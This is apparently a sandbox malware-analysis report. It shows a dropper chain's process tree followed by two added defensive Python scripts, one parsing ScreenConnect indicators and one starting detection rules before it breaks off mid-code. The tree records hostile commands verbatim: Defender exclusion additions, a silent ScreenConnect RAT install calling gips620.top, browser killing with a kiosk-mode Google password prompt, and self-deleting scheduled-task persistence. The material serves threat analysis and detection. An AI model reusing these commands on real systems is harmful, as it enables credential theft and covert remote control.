C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\vqmxaeos"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1524
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017680001\ga70pjP.exe"C:\Users\Admin\AppData\Local\Temp\1017680001\ga70pjP.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:680 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\98a59bd0eed9222b\ScreenConnect.ClientSetup.msi"5⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2304
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017763001\INOKWGC.exe"C:\Users\Admin\AppData\Local\Temp\1017763001\INOKWGC.exe"4⤵
- Executes dropped EXE
PID:1940
-
-
C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe"C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe"C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2752
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017916001\UZAj8wc.exe"C:\Users\Admin\AppData\Local\Temp\1017916001\UZAj8wc.exe"4⤵
- Drops startup file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2980 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 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⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4996
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2980 -s 9685⤵
- Loads dropped DLL
- Program crash
PID:5940
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017975001\b0b45e7a6c.exe"C:\Users\Admin\AppData\Local\Temp\1017975001\b0b45e7a6c.exe"4⤵
- Executes dropped EXE
PID:6788
-
-
C:\Users\Admin\AppData\Local\Temp\1017977001\02d487f7c7.exe"C:\Users\Admin\AppData\Local\Temp\1017977001\02d487f7c7.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:3280
-
-
C:\Users\Admin\AppData\Local\Temp\1017984001\77ce657d01.exe"C:\Users\Admin\AppData\Local\Temp\1017984001\77ce657d01.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4688 -
C:\Users\Admin\AppData\Local\Temp\1017984001\77ce657d01.exe"C:\Users\Admin\AppData\Local\Temp\1017984001\77ce657d01.exe"5⤵
- Executes dropped EXE
PID:3536
-
-
C:\Users\Admin\AppData\Local\Temp\1017984001\77ce657d01.exe"C:\Users\Admin\AppData\Local\Temp\1017984001\77ce657d01.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3548
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017985001\08d1669db1.exe"C:\Users\Admin\AppData\Local\Temp\1017985001\08d1669db1.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5260
-
-
C:\Users\Admin\AppData\Local\Temp\1017986001\a1740268cc.exe"C:\Users\Admin\AppData\Local\Temp\1017986001\a1740268cc.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5840
-
-
C:\Users\Admin\AppData\Local\Temp\1017987001\36e225cffd.exe"C:\Users\Admin\AppData\Local\Temp\1017987001\36e225cffd.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6452 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\pmrkx"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6692
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:680
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017988001\8904b059d8.exe"C:\Users\Admin\AppData\Local\Temp\1017988001\8904b059d8.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2316 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"5⤵
- Loads dropped DLL
PID:3096 -
C:\Windows\system32\mode.commode 65,106⤵PID:3152
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p24291711423417250691697322505 -oextracted6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3168
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_7.zip -oextracted6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3212
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_6.zip -oextracted6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3260
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_5.zip -oextracted6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3300
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_4.zip -oextracted6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3344
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_3.zip -oextracted6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3380
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted6⤵
- Executes dropped EXE
PID:3424
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted6⤵
- Executes dropped EXE
PID:3460
-
-
C:\Windows\system32\attrib.exeattrib +H "in.exe"6⤵
- Views/modifies file attributes
PID:3516
-
-
C:\Users\Admin\AppData\Local\Temp\main\in.exe"in.exe"6⤵
- Executes dropped EXE
PID:3524 -
C:\Windows\system32\attrib.exeattrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe7⤵
- Views/modifies file attributes
PID:3560
-
-
C:\Windows\system32\attrib.exeattrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe7⤵
- Views/modifies file attributes
PID:3576
-
-
C:\Windows\system32\schtasks.exeschtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE7⤵
- Scheduled Task/Job: Scheduled Task
PID:3592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ping 127.0.0.1; del in.exe7⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3608 -
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.0.0.18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10584
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017989001\02e4c18c72.exe"C:\Users\Admin\AppData\Local\Temp\1017989001\02e4c18c72.exe"4⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:10348
-
-
C:\Users\Admin\AppData\Local\Temp\1017990001\1fdc12c3d0.exe"C:\Users\Admin\AppData\Local\Temp\1017990001\1fdc12c3d0.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:10664 -
C:\Users\Admin\AppData\Local\Temp\1017990001\1fdc12c3d0.exe"C:\Users\Admin\AppData\Local\Temp\1017990001\1fdc12c3d0.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2856
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017991001\8d2b699a41.exe"C:\Users\Admin\AppData\Local\Temp\1017991001\8d2b699a41.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:10800
-
-
C:\Users\Admin\AppData\Local\Temp\1017992001\caee26767d.exe"C:\Users\Admin\AppData\Local\Temp\1017992001\caee26767d.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:10980 -
C:\Users\Admin\AppData\Local\Temp\1017992001\caee26767d.exe"C:\Users\Admin\AppData\Local\Temp\1017992001\caee26767d.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:11072
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017993001\a009087586.exe"C:\Users\Admin\AppData\Local\Temp\1017993001\a009087586.exe"4⤵
- Executes dropped EXE
PID:11224
-
-
C:\Users\Admin\AppData\Local\Temp\1017994001\eb73c920fa.exe"C:\Users\Admin\AppData\Local\Temp\1017994001\eb73c920fa.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3756 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\fujjrkmapd"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3744
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5356
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017995001\530b5596f6.exe"C:\Users\Admin\AppData\Local\Temp\1017995001\530b5596f6.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6204
-
-
C:\Users\Admin\AppData\Local\Temp\1017996001\cf68e84021.exe"C:\Users\Admin\AppData\Local\Temp\1017996001\cf68e84021.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2112
-
-
C:\Users\Admin\AppData\Local\Temp\1017997001\5fd6925fa4.exe (depth 4)
Command line: "C:\Users\Admin\AppData\Local\Temp\1017997001\5fd6925fa4.exe"
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID: 7128

C:\Windows\SysWOW64\taskkill.exe (depth 5)
Command line: taskkill /F /IM firefox.exe /T
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID: 2688

C:\Windows\SysWOW64\taskkill.exe (depth 5)
Command line: taskkill /F /IM chrome.exe /T
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID: 1720

C:\Windows\SysWOW64\taskkill.exe (depth 5)
Command line: taskkill /F /IM msedge.exe /T
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID: 3172

C:\Windows\SysWOW64\taskkill.exe (depth 5)
Command line: taskkill /F /IM opera.exe /T
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID: 4476

C:\Windows\SysWOW64\taskkill.exe (depth 5)
Command line: taskkill /F /IM brave.exe /T
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID: 2440

C:\Program Files\Mozilla Firefox\firefox.exe (depth 5)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
PID: 4160

C:\Program Files\Mozilla Firefox\firefox.exe (depth 6)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID: 2140

C:\Program Files\Mozilla Firefox\firefox.exe (depth 7)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2140.0.1598087842\57287049" -parentBuildID 20221007134813 -prefsHandle 1220 -prefMapHandle 1212 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a5a75564-3ad2-4a71-8a9a-9895581cafd2} 2140 "\\.\pipe\gecko-crash-server-pipe.2140" 1296 14a06558 gpu
PID: 5184

C:\Program Files\Mozilla Firefox\firefox.exe (depth 7)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2140.1.2131952547\1659974851" -parentBuildID 20221007134813 -prefsHandle 1500 -prefMapHandle 1496 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8963bcd4-5d60-4167-ae7f-62b82d66808c} 2140 "\\.\pipe\gecko-crash-server-pipe.2140" 1512 111fca58 socket
PID: 5532

C:\Program Files\Mozilla Firefox\firefox.exe (depth 7)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2140.2.845680683\854013665" -childID 1 -isForBrowser -prefsHandle 2100 -prefMapHandle 2096 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {80a70037-aa2a-4fd7-ade1-0eebd21e8d70} 2140 "\\.\pipe\gecko-crash-server-pipe.2140" 2112 19aa0058 tab
PID: 2268

C:\Program Files\Mozilla Firefox\firefox.exe (depth 7)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2140.3.598088173\418818974" -childID 2 -isForBrowser -prefsHandle 2900 -prefMapHandle 2896 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1658d558-f4ee-4503-9c15-c3aaa2f742e0} 2140 "\\.\pipe\gecko-crash-server-pipe.2140" 2912 1dcb4558 tab
PID: 7772

C:\Program Files\Mozilla Firefox\firefox.exe (depth 7)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2140.4.984287445\1364818881" -childID 3 -isForBrowser -prefsHandle 2836 -prefMapHandle 3116 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {37b6e6cc-105d-41f1-8a87-8e6b9299d039} 2140 "\\.\pipe\gecko-crash-server-pipe.2140" 3812 1fd7bb58 tab
PID: 9468

C:\Program Files\Mozilla Firefox\firefox.exe (depth 7)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2140.5.1034588739\1571592605" -childID 4 -isForBrowser -prefsHandle 3936 -prefMapHandle 3940 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {757fd711-f1a3-48b2-a011-c37ffa5b531e} 2140 "\\.\pipe\gecko-crash-server-pipe.2140" 3928 201fb558 tab
PID: 9484

C:\Program Files\Mozilla Firefox\firefox.exe (depth 7)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2140.6.1019346328\317514970" -childID 5 -isForBrowser -prefsHandle 4108 -prefMapHandle 4112 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {085c8a5d-b75f-4ada-8785-d49ec9a045df} 2140 "\\.\pipe\gecko-crash-server-pipe.2140" 4092 201fd958 tab
PID: 9504

C:\Users\Admin\AppData\Local\Temp\1017998001\cd12090932.exe (depth 4)
Command line: "C:\Users\Admin\AppData\Local\Temp\1017998001\cd12090932.exe"
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID: 3804

C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe (depth 2)
Command line: "C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe"
- Executes dropped EXE
PID: 6292

C:\Windows\system32\msiexec.exe (depth 1)
Command line: C:\Windows\system32\msiexec.exe /V
- Enumerates connected drives
- Boot or Logon Autostart Execution: Authentication Package
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 580

C:\Windows\syswow64\MsiExec.exe (depth 2)
Command line: C:\Windows\syswow64\MsiExec.exe -Embedding E9D7F5961BFC63812427DF38F1DCC1DC C
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID: 376

C:\Windows\SysWOW64\rundll32.exe (depth 3)
Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIB5A9.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259438102 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID: 640

C:\Windows\syswow64\MsiExec.exe (depth 2)
Command line: C:\Windows\syswow64\MsiExec.exe -Embedding CD29DF24C75E515C3CB7465359D085DD
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID: 2208

C:\Windows\syswow64\MsiExec.exe (depth 2)
Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 56B2E12D0E85BB15C22795AAA4F3278C M Global\MSI0000
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID: 1612

C:\Windows\system32\vssvc.exe (depth 1)
Command line: C:\Windows\system32\vssvc.exe
PID: 1708

C:\Windows\system32\DrvInst.exe (depth 1)
Command line: DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000005EC" "00000000000003D4"
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID: 7064

C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.exe (depth 1)
Command line: "C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=gips620.top&p=8880&s=7333f63c-2cb1-4fe8-acd5-211dab881baa&k=BgIAAACkAABSU0ExAAgAAAEAAQDpOwIVy34yVx7xLDnH6rBeYx7mmiLN2yQyIYdJTxYIVHOsytxx89D0YKoH68EoEXToTuDpMmwJb%2bhrlJ3faNFTpvu7W8w3%2fxYUdeWuXWg%2bTQxXr6EWby912nykdroWfBxDx6Lmxg1gxGgRJHC8Oc96zV%2fiaqo5GlyagtszKkrbPOWW4FBVQPXhlUfH4mlFE0i0vcMxGginTYl8IjGBzr94ANeAXwajoe9Cjam2haoL%2f%2bgHMtFYBZJisALFnyX3zECpRv7vqWzNAQJYIqY6qDuC2lEbs0NtuBMSfQRW1t0ZOk7cEzuQjq72QbWf1bR8rZf%2b0t3VNSgkIUcBljvpSRK7&c=VIRUS101&c=https%3a%2f%2ft.me%2fvirus101Screenconnect&c=PC%20RAT&c=PC%20RAT&c=&c=&c=&c="
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID: 2984

C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe (depth 2)
Command line: "C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe" "RunRole" "92fd7e28-665a-4169-bc10-0502ef9c0e37" "User"
- Executes dropped EXE
PID: 4188

C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe (depth 2)
Command line: "C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe" "RunRole" "be5eaa52-dc00-4cff-baca-835bc0494257" "System"
- Executes dropped EXE
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID: 4500

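The ScreenConnect.ClientService.exe launch string above carries everything the remote-access client needs to reach its operator, so it is worth unpacking rather than reading as an opaque blob. The script below is an added example and is not part of the sandbox report or of ScreenConnect; the command line is the one shown in the tree, embedded here as constructed input so the script runs offline. The parameter meanings follow ScreenConnect's client-launch convention and are an assumption of this example, not something the report states: h is the relay host, p the relay port, s the session GUID, e the session type, y the process type, k the server's RSA public key as a CryptoAPI PUBLICKEYBLOB, and the repeated c values are the custom properties the operator typed into the build page. Host plus port is the network indicator to block, the custom fields show the operator's branding, and a hash of the key blob identifies the relay even if it moves to a new hostname.

```python
"""Unpack the ScreenConnect.ClientService.exe launch string from this report.

Added example, not part of the report or of ScreenConnect itself. CMDLINE is
the command line shown in the process tree, embedded as constructed input.
Parameter meanings (h, p, s, e, y, k, c) are assumed from ScreenConnect's
client-launch convention; the report itself does not describe them.
"""
import base64
import hashlib
import struct
from urllib.parse import parse_qs

CMDLINE = (
    r'"C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.exe" '
    '"?e=Access&y=Guest&h=gips620.top&p=8880&s=7333f63c-2cb1-4fe8-acd5-211dab881baa'
    '&k=BgIAAACkAABSU0ExAAgAAAEAAQDpOwIVy34yVx7xLDnH6rBeYx7mmiLN2yQyIYdJTxYIVHOsytxx89D0YKoH68EoEXToTuDpMmwJb%2bhrlJ3faNFTpvu7W8w3%2fxYUdeWuXWg%2bTQxXr6EWby912nykdroWfBxDx6Lmxg1gxGgRJHC8Oc96zV%2fiaqo5GlyagtszKkrbPOWW4FBVQPXhlUfH4mlFE0i0vcMxGginTYl8IjGBzr94ANeAXwajoe9Cjam2haoL%2f%2bgHMtFYBZJisALFnyX3zECpRv7vqWzNAQJYIqY6qDuC2lEbs0NtuBMSfQRW1t0ZOk7cEzuQjq72QbWf1bR8rZf%2b0t3VNSgkIUcBljvpSRK7'
    '&c=VIRUS101&c=https%3a%2f%2ft.me%2fvirus101Screenconnect&c=PC%20RAT&c=PC%20RAT&c=&c=&c=&c="'
)

CALG_RSA_KEYX = 0x0000A400  # CryptoAPI ALG_ID for an RSA key-exchange key


def extract_query(cmdline: str) -> str:
    """Return the quoted argument that begins with '?', without quotes or '?'."""
    start = cmdline.index('"?') + 2
    return cmdline[start:cmdline.index('"', start)]


def parse_publickeyblob(b64: str) -> dict:
    """Decode a CryptoAPI PUBLICKEYBLOB: BLOBHEADER, RSAPUBKEY, little-endian modulus."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))   # tolerate missing padding
    btype, _bver, _reserved, alg = struct.unpack_from("<BBHI", raw, 0)
    magic, bits, exponent = struct.unpack_from("<4sII", raw, 8)
    modulus_le = raw[20:20 + bits // 8]
    return {
        "blob_type": btype,                          # 0x06 = PUBLICKEYBLOB
        "alg_id": alg,                               # expect CALG_RSA_KEYX
        "magic": magic.decode("ascii", "replace"),   # "RSA1"
        "bits": bits,
        "exponent": exponent,
        "modulus_complete": len(modulus_le) == bits // 8,
        # stable identifier for the relay's key, usable as an indicator
        "sha256": hashlib.sha256(raw).hexdigest(),
    }


def parse_client_launch(cmdline: str) -> dict:
    """Split the launch string into relay, session and operator-supplied fields."""
    q = parse_qs(extract_query(cmdline), keep_blank_values=True)

    def one(name: str) -> str:
        return q.get(name, [""])[0]

    return {
        "session_type": one("e"),
        "process_type": one("y"),
        "relay_host": one("h"),
        "relay_port": int(one("p")),
        "session_id": one("s"),
        "custom": [c for c in q.get("c", []) if c],   # drop the unused empty slots
        "server_key": parse_publickeyblob(one("k")),
    }


if __name__ == "__main__":
    info = parse_client_launch(CMDLINE)
    key = info.pop("server_key")
    print(info)
    print({k: v for k, v in key.items() if k != "sha256"}, "key sha256:", key["sha256"][:16])
```

The blob header is enough to confirm the key is a 2048-bit RSA key with the usual public exponent; the modulus itself is only needed if you want to fingerprint the relay. Hashing the whole decoded blob gives a value you can match across samples built from the same ScreenConnect server.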
C:\Windows\system32\taskeng.exe (depth 1)
Command line: taskeng.exe {FE6F4579-448E-4B8F-B80A-28F6D5FD3B90} S-1-5-21-1488793075-819845221-1497111674-1000:UPNECVIU\Admin:Interactive:[1]
PID: 8872

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe (depth 2)
Command line: C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID: 10068

C:\Windows\explorer.exe (depth 3)
Command line: explorer.exe
PID: 10204

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
Command line: powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
- Drops file in System32 directory
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious behavior: EnumeratesProcesses
PID: 5148

C:\Windows\system32\PING.EXE (depth 4)
Command line: "C:\Windows\system32\PING.EXE" 127.1.10.1
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID: 5436
Note: 127.1.10.1 is a loopback address (127.0.0.0/8), so this ping is a few seconds of delay before the del removes the dropper, not a real connectivity check.

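Two patterns in the tree above are worth turning into rules. The first is the sequence under 5fd6925fa4.exe: every common browser is force-killed with taskkill, then Firefox is relaunched in --kiosk mode on a URL whose query string embeds a Google password-challenge page; in kiosk mode that is a full-screen sign-in prompt with no address bar and no close button, and the likely intent is to make the user type a password that the stealers in this chain can then harvest. The second is the scheduled-task payload that runs "ping <loopback>; del <self>", a sleep followed by self-deletion. The script below is an added example, not part of the report or of any sandbox; its SAMPLE_TREE records are constructed from the tree above (PIDs and parent links as shown; the parent of 5fd6925fa4.exe lies outside this excerpt, so it is given the placeholder ppid 0). The rule names, the browser list and the sign-in keywords are choices of this example.

```python
"""Two process-tree rules written against the command lines in this report.

Added example, not part of the sandbox report or of any tool it names.
SAMPLE_TREE is constructed from the tree above; ppid 0 is a placeholder for
a parent outside the excerpt. Runs offline.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address
from urllib.parse import urlparse


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str     # image path as the sandbox records it
    cmdline: str   # command line as the sandbox records it


BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "opera.exe", "brave.exe"}
TASKKILL = {"taskkill.exe"}
KIOSK_RE = re.compile(r'(?i)--kiosk\s+"?(https?://[^\s"]+)')
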